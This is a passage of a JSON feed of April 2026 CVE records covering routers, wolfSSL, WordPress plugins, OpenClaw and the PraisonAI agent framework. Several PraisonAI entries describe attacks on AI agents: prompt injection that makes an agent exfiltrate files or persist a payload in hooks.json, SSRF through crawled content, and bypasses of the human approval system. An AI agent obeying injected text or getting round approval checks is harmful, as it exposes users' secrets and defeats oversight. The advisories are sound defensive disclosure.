The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.1,"cvss_version":4.0,"cvss_v2":5.8,"cvss_v3":4.7,"cvss_v4":5.1,"epss":0.00043,"ranking_epss":0.12891,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/sanluan/PublicCMS/","https://github.com/sanluan/PublicCMS/issues/113","https://vuldb.com/submit/792385","https://vuldb.com/vuln/356541","https://vuldb.com/vuln/356541/cti"],"published_time":"2026-04-09T23:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5988","summary":"A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Performing a manipulation of the argument mit_ssid results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/4","https://vuldb.com/submit/792857","https://vuldb.com/vuln/356542","https://vuldb.com/vuln/356542/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-09T23:17:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5295","summary":"A stack buffer overflow exists in wolfSSL's PKCS7 implementation in the wc_PKCS7_DecryptOri() function in wolfcrypt/src/pkcs7.c. When processing a CMS EnvelopedData message containing an OtherRecipientInfo (ORI) recipient, the function copies an ASN.1-parsed OID into a fixed 32-byte stack buffer (oriOID[MAX_OID_SZ]) via XMEMCPY without first validating that the parsed OID length does not exceed MAX_OID_SZ. A crafted CMS EnvelopedData message with an ORI recipient containing an OID longer than 32 bytes triggers a stack buffer overflow. 
Exploitation requires the library to be built with --enable-pkcs7 (disabled by default) and the application to have registered an ORI decrypt callback via wc_PKCS7_SetOriDecryptCb().","cvss":5.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.9,"epss":0.00016,"ranking_epss":0.03706,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10116"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5503","summary":"In TLSX_EchChangeSNI, the ctx->extensions branch set extensions unconditionally even when TLSX_Find returned NULL. This caused TLSX_UseSNI to attach the attacker-controlled publicName to the shared WOLFSSL_CTX when no inner SNI was configured. TLSX_EchRestoreSNI then failed to clean it up because its removal was gated on serverNameX != NULL. The inner ClientHello was sized before the pollution but written after it, causing TLSX_SNI_Write to memcpy 255 bytes past the allocation boundary.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10102"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5504","summary":"A padding oracle exists in wolfSSL's PKCS7 CBC decryption that could allow an attacker to recover plaintext through repeated decryption queries with modified ciphertext. 
In previous versions of wolfSSL the interior padding bytes are not validated.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00019,"ranking_epss":0.0495,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10088"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5507","summary":"When restoring a session from cache, a pointer from the serialized session data is used in a free operation without validation. An attacker who can poison the session cache could trigger an arbitrary free. Exploitation requires the ability to inject a crafted session into the cache and for the application to call specific session restore APIs.","cvss":4.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.1,"epss":0.00016,"ranking_epss":0.03636,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10088"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5985","summary":"A security flaw has been discovered in code-projects Simple IT Discussion Forum 1.0. The affected element is an unknown function of the file /crud.php. The manipulation of the argument user_Id results in sql injection. The attack may be performed from remote. 
The exploit has been released to the public and may be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/2581565901/thebugihadfind/issues/1","https://vuldb.com/submit/791897","https://vuldb.com/vuln/356539","https://vuldb.com/vuln/356539/cti"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5986","summary":"A weakness has been identified in Zod jsVideoUrlParser up to 0.5.1. The impacted element is the function getTime in the library lib/util.js. This manipulation of the argument timestamp causes inefficient regular expression complexity. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.5,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":5.3,"cvss_v4":5.5,"epss":0.00042,"ranking_epss":0.12587,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Zod-/jsVideoUrlParser/issues/121","https://github.com/Zod-/jsVideoUrlParser/issues/121#issue-4159661957","https://vuldb.com/submit/791911","https://vuldb.com/vuln/356540","https://vuldb.com/vuln/356540/cti"],"published_time":"2026-04-09T23:17:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34424","summary":"Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. 
Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hidden administrator accounts, exfiltrate credentials and access keys, and maintain persistence through multiple injection points including must-use plugins and core file modifications.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00152,"ranking_epss":0.35907,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/","https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/","https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability","https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory-smart-slider-3-pro-3-5-1-35-compromise","https://smartslider.helpscoutdocs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35-compromise"],"published_time":"2026-04-09T23:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5778","summary":"Integer underflow in wolfSSL packet sniffer <= 5.9.0 allows an attacker to cause a program crash in the AEAD decryption path by injecting a TLS record shorter than the explicit IV plus authentication tag into traffic inspected by ssl_DecodePacket. The underflow wraps a 16-bit length to a large value that is passed to AEAD decryption routines, causing a large out-of-bounds read and crash. 
An unauthenticated attacker can trigger this remotely via malformed TLS Application Data records.","cvss":2.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.1,"epss":0.0006,"ranking_epss":0.18676,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10125"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5981","summary":"A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the function formAdvFirewall of the file /goform/formAdvFirewall of the component POST Request Handler. Such manipulation of the argument curTime leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formAdvFirewall-33153a41781f80678733f4b12282f3fa?source=copy_link","https://vuldb.com/submit/791854","https://vuldb.com/vuln/356535","https://vuldb.com/vuln/356535/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5982","summary":"A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects the function formAdvNetwork of the file /goform/formAdvNetwork of the component POST Request Handler. Performing a manipulation of the argument curTime results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. 
This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formAdvNetwork-33153a41781f80f9a47bd5e073fc00ae?source=copy_link","https://vuldb.com/submit/791855","https://vuldb.com/vuln/356536","https://vuldb.com/vuln/356536/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5983","summary":"A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects the function formSetDDNS of the file /goform/formSetDDNS of the component POST Request Handler. Executing a manipulation of the argument curTime can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00045,"ranking_epss":0.13505,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formSetDDNS-33153a41781f802f9997f48dc9cf6304?source=copy_link","https://vuldb.com/submit/791856","https://vuldb.com/vuln/356537","https://vuldb.com/vuln/356537/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5984","summary":"A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the function formSetLog of the file /goform/formSetLog of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. 
This vulnerability only affects products that are no longer supported by the maintainer.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00019,"ranking_epss":0.0481,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lavender-bicycle-a5a.notion.site/D-Link-DIR-605L-formSetLog-33153a41781f8038bbbcc04073d7875b?source=copy_link","https://vuldb.com/submit/791857","https://vuldb.com/vuln/356538","https://vuldb.com/vuln/356538/cti","https://www.dlink.com/"],"published_time":"2026-04-09T22:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40151","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the AgentOS deployment platform exposes a GET /api/agents endpoint that returns agent names, roles, and the first 100 characters of agent system instructions to any unauthenticated caller. The AgentOS FastAPI application has no authentication middleware, no API key validation, and defaults to CORS allow_origins=[\"*\"] with host=\"0.0.0.0\", making every deployment network-accessible and queryable from any origin by default. This vulnerability is fixed in 4.5.128.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09669,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pm96-6xpr-978x"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40152","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the list_files() tool in FileTools validates the directory parameter against workspace boundaries via _validate_path(), but passes the pattern parameter directly to Path.glob() without any validation. Since Python's Path.glob() supports .. 
path segments, an attacker can use relative path traversal in the glob pattern to enumerate arbitrary files outside the workspace, obtaining file metadata (existence, name, size, timestamps) for any path on the filesystem. This vulnerability is fixed in 1.5.128.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00048,"ranking_epss":0.14609,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40153","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the execute_command function in shell_tools.py calls os.path.expandvars() on every command argument at line 64, manually re-implementing shell-level environment variable expansion despite using shell=False (line 88) for security. This allows exfiltration of secrets stored in environment variables (database credentials, API keys, cloud access keys). The approval system displays the unexpanded $VAR references to human reviewers, creating a deceptive approval where the displayed command differs from what actually executes. This vulnerability is fixed in 1.5.128.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v8g7-9q6v-p3x8","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v8g7-9q6v-p3x8"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40154","summary":"PraisonAI is a multi-agent teams system. 
Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through malicious templates. This vulnerability is fixed in 4.5.128.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pv9q-275h-rh7x"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5263","summary":"URI nameConstraints from constrained intermediate CAs are parsed but not enforced during certificate chain verification in wolfcrypt/src/asn.c. A compromised or malicious sub-CA could issue leaf certificates with URI SAN entries that violate the nameConstraints of the issuing CA, and wolfSSL would accept them as valid.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":0.0002,"ranking_epss":0.05412,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10048"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5264","summary":"Heap buffer overflow in DTLS 1.3 ACK message processing. 
A remote attacker can send a crafted DTLS 1.3 ACK message that triggers a heap buffer overflow.","cvss":8.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.3,"epss":0.00183,"ranking_epss":0.40064,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfssl/wolfssl/pull/10076"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5772","summary":"A 1-byte stack buffer over-read was identified in the MatchDomainName function (src/internal.c) during wildcard hostname validation when the LEFT_MOST_WILDCARD_ONLY flag is active.  If a wildcard * exhausts the entire hostname string, the function reads one byte past the buffer without a bounds check, which could cause a crash.","cvss":2.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.1,"epss":0.00042,"ranking_epss":0.12568,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/wolfSSL/wolfssl/pull/10119"],"published_time":"2026-04-09T22:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40114","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /api/v1/runs endpoint accepts an arbitrary webhook_url in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using httpx.AsyncClient. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services. 
This vulnerability is fixed in 4.5.128.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07357,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40115","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the WSGI-based recipe registry server (server.py) reads the entire HTTP request body into memory based on the client-supplied Content-Length header with no upper bound. Combined with authentication being disabled by default (no token configured), any local process can send arbitrarily large POST requests to exhaust server memory and cause a denial of service. The Starlette-based server (serve.py) has RequestSizeLimitMiddleware with a 10MB limit, but the WSGI server lacks any equivalent protection. This vulnerability is fixed in 4.5.128.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05263,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2xgv-5cv2-47vv"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40116","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. 
There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits. This vulnerability is fixed in 4.5.128.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00035,"ranking_epss":0.10323,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40117","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, read_skill_file() in skill_tools.py allows reading arbitrary files from the filesystem by accepting an unrestricted skill_path parameter. Unlike file_tools.read_file which enforces workspace boundary confinement, and unlike run_skill_script which requires critical-level approval, read_skill_file has neither protection. An agent influenced by prompt injection can exfiltrate sensitive files without triggering any approval prompt. This vulnerability is fixed in 1.5.128.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04085,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-grrg-5cg9-58pf"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40148","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the _safe_extractall() function in PraisonAI's recipe registry validates archive members against path traversal attacks but performs no checks on individual member sizes, cumulative extracted size, or member count before calling tar.extractall(). 
An attacker can publish a malicious recipe bundle containing highly compressible data (e.g., 10GB of zeros compressing to ~10MB) that exhausts the victim's disk when pulled via LocalRegistry.pull() or HttpRegistry.pull(). This vulnerability is fixed in 4.5.128.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09836,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f2h6-7xfr-xm8w"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40149","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool names (e.g., shell_exec, file_write) to the allowlist, an attacker can cause the ExecApprovalManager to auto-approve all future agent invocations of those tools, bypassing the human-in-the-loop safety mechanism that the approval system is specifically designed to enforce. This vulnerability is fixed in 4.5.128.","cvss":7.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.9,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01582,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40150","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the web_crawl() function in praisonaiagents/tools/web_crawl_tools.py accepts arbitrary URLs from AI agents with zero validation. No scheme allowlisting, hostname/IP blocklisting, or private network checks are applied before fetching. 
This allows an attacker (or prompt injection in crawled content) to force the agent to fetch cloud metadata endpoints, internal services, or local files via file:// URLs. This vulnerability is fixed in 1.5.128.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07769,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8f4v-xfm9-3244","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8f4v-xfm9-3244"],"published_time":"2026-04-09T22:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35645","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion without a request-scoped client to execute privileged operations with unintended administrative scope.","cvss":6.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":6.1,"epss":0.00034,"ranking_epss":0.1004,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7","https://github.com/openclaw/openclaw/security/advisories/GHSA-h4jx-hjr3-fhgc","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-synthetic-operator-admin-in-deletesession"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35646","summary":"OpenClaw before 2026.3.25 contains a pre-authentication rate-limit bypass vulnerability in webhook token validation that allows attackers to brute-force weak webhook secrets. 
The vulnerability exists because invalid webhook tokens are rejected without throttling repeated authentication attempts, enabling attackers to guess weak tokens through rapid successive requests.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.8,"cvss_v4":6.3,"epss":0.00055,"ranking_epss":0.17206,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c","https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm","https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39848","summary":"Dockyard is a Docker container management app. Prior to 1.1.0, Docker container start and stop operations are performed through GET requests without CSRF protection. A remote attacker can cause a logged-in administrator's browser to request /apps/action.php?action=stop&name=<container> or /apps/action.php?action=start&name=<container>, which starts or stops the target container. This vulnerability is fixed in 1.1.0.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09622,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/10ij/dockyard/security/advisories/GHSA-jrf6-3j4j-q36g","https://github.com/10ij/dockyard/security/advisories/GHSA-jrf6-3j4j-q36g"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40111","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, the memory hooks executor in praisonaiagents passes a user-controlled command string directly to subprocess.run() with shell=True at src/praisonai-agents/praisonaiagents/memory/hooks.py. 
No sanitization is performed and shell metacharacters are interpreted by /bin/sh before the intended command executes. Two independent attack surfaces exist. The first is via pre_run_command and post_run_command hook event types registered through the hooks configuration. The second and more severe surface is the .praisonai/hooks.json lifecycle configuration, where hooks registered for events such as BEFORE_TOOL and AFTER_TOOL fire automatically during agent operation. An agent that gains file-write access through prompt injection can overwrite .praisonai/hooks.json and have its payload execute silently at every subsequent lifecycle event without further user interaction. This vulnerability is fixed in 1.5.128.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00022,"ranking_epss":0.05886,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v7px-3835-7gjx","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-v7px-3835-7gjx"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40112","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the Flask API endpoint in src/praisonai/api.py renders agent output as HTML without effective sanitization. The _sanitize_html function relies on the nh3 library, which is not listed as a required or optional dependency in pyproject.toml. When nh3 is absent (the default installation), the sanitizer is a no-op that returns HTML unchanged. An attacker who can influence agent input (via RAG data poisoning, web scraping results, or prompt injection) can inject arbitrary JavaScript that executes in the browser of anyone viewing the API output. 
This vulnerability is fixed in 4.5.128.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08026,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfg2-mxfj-j6pw"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40113","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, deploy.py constructs a single comma-delimited string for the gcloud run\ndeploy --set-env-vars argument by directly interpolating openai_model, openai_key, and openai_base without validating that these values do not contain commas. gcloud uses a comma as the key-value pair separator for --set-env-vars. A comma in any of the three values causes gcloud to parse the trailing text as additional KEY=VALUE definitions, injecting arbitrary environment variables into the deployed Cloud Run service. This vulnerability is fixed in 4.5.128.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":0.00019,"ranking_epss":0.0494,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fvxx-ggmx-3cjg"],"published_time":"2026-04-09T22:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35638","summary":"OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the Control UI that allows unauthenticated sessions to retain self-declared privileged scopes without device identity verification. 
Attackers can exploit the device-less allow path in the trusted-proxy mechanism to maintain elevated permissions by declaring arbitrary scopes, bypassing device identity requirements.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00041,"ranking_epss":0.12308,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ccf16cd8892402022439346ae1d23352e3707e9e","https://github.com/openclaw/openclaw/security/advisories/GHSA-48vw-m3qc-wr99","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-self-declared-scopes-in-trusted-proxy-control-ui"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35639","summary":"OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. 
Attackers can exploit insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00199,"ranking_epss":0.41961,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"],"published_time":"2026-04-09T22:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35640","summary":"OpenClaw before 2026.3.25 parses JSON request bodies before validating webhook signatures, allowing unauthenticated attackers to force resource-intensive parsing operations. Remote attackers can send malicious webhook requests to trigger denial of service by exhausting server resources through forced JSON parsing before signature 